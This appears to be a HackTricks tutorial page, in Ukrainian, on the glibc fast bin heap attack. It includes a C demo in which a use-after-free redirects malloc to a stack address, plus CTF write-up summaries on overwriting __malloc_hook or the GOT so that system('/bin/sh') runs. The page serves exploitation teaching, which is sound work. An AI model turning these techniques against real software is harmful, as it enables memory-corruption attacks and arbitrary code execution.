Fast Bin Attack

Reading time: 9 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Основна інформація

Для отримання додаткової інформації про те, що таке fast bin, перегляньте цю сторінку:

Bins & Memory Allocations

Оскільки fast bin є однозв'язним списком, захистів значно менше, ніж в інших bins, і просто модифікація адреси в звільненому fast bin шматку достатня, щоб потім виділити шматок за будь-якою адресою пам'яті.

У підсумку:

c
ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

Ви можете знайти повний приклад у дуже добре поясненому коді з https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html:

c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

caution

Якщо можливо перезаписати значення глобальної змінної global_max_fast великим числом, це дозволяє генерувати швидкі бін-чанки більших розмірів, що потенційно дозволяє виконувати атаки на швидкі бін-чанки в сценаріях, де це раніше було неможливо. Ця ситуація корисна в контексті large bin attack та unsorted bin attack

Приклади

  • CTF https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html:
  • Можливо виділяти чанки, звільняти їх, читати їх вміст і заповнювати їх (з вразливістю переповнення).
  • Консолідація чанка для витоку інформації: Техніка полягає в зловживанні переповненням для створення фальшивого prev_size, щоб один попередній чанк був поміщений всередину більшого, тому при виділенні більшого, що містить інший чанк, можливо вивести його дані та витік адреси до libc (main_arena+88).
  • Перезапис хука malloc: Для цього, зловживаючи попередньою ситуацією накладення, було можливо мати 2 чанки, які вказували на одну й ту ж пам'ять. Тому, звільнивши їх обидва (звільнивши інший чанк між ними, щоб уникнути захисту), було можливо мати той самий чанк у швидкому біні 2 рази. Потім його можна було знову виділити, перезаписати адресу наступного чанка, щоб вказати трохи перед __malloc_hook (щоб вона вказувала на ціле число, яке malloc вважає вільним розміром - ще один обхід), знову виділити його, а потім виділити інший чанк, який отримає адресу до хуків malloc.
    Нарешті, один гаджет був записаний туди.
  • CTF https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html:
  • Існує переповнення купи та використання після звільнення і подвійне звільнення, оскільки коли чанк звільняється, можливо повторно використовувати та знову звільняти вказівники.
  • Витік інформації libc: Просто звільніть кілька чанків, і вони отримають вказівник на частину місця основної арени. Оскільки ви можете повторно використовувати звільнені вказівники, просто прочитайте цю адресу.
  • Атака на швидкі бін-чанки: Усі вказівники на виділення зберігаються в масиві, тому ми можемо звільнити кілька швидких бін-чанків, а в останньому перезаписати адресу, щоб вказати трохи перед цим масивом вказівників. Потім виділимо кілька чанків одного розміру, і спочатку отримаємо легітимний, а потім фальшивий, що містить масив вказівників. Тепер ми можемо перезаписати ці вказівники виділення, щоб зробити GOT-адресу free вказувати на system, а потім записати "/bin/sh" в чанк 1, щоб потім викликати free(chunk1), що замість цього виконає system("/bin/sh").
  • CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html
  • Ще один приклад зловживання переповненням одного байта для консолідації чанків в неупорядкованому біні та отримання витоку інформації libc, а потім виконання атаки на швидкі бін-чанки для перезапису хука malloc з адресою одного гаджета.
  • CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html
  • Після витоку інформації, зловживаючи неупорядкованим біном з UAF для витоку адреси libc та адреси PIE, експлуатація цього CTF використовувала атаку на швидкі бін-чанки для виділення чанка в місці, де знаходилися вказівники на контрольовані чанки, тому було можливо перезаписати певні вказівники, щоб записати один гаджет у GOT.
  • Ви можете знайти атаку на швидкі бін-чанки, зловживаючи через атаку на неупорядкований бін:
  • Зверніть увагу, що зазвичай перед виконанням атак на швидкі бін-чанки зловживають списками звільнення для витоку адрес libc/купи (коли це необхідно).
  • Robot Factory. BlackHat MEA CTF 2022
  • Ми можемо виділяти лише чанки розміром більшим за 0x100.
  • Перезаписати global_max_fast, використовуючи атаку на неупорядкований бін (працює 1/16 разів через ASLR, оскільки нам потрібно змінити 12 біт, але ми повинні змінити 16 біт).
  • Атака на швидкі бін-чанки для модифікації глобального масиву чанків. Це дає примітив довільного читання/запису, що дозволяє модифікувати GOT і встановити деякі функції, щоб вказувати на system.

Unsorted Bin Attack

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks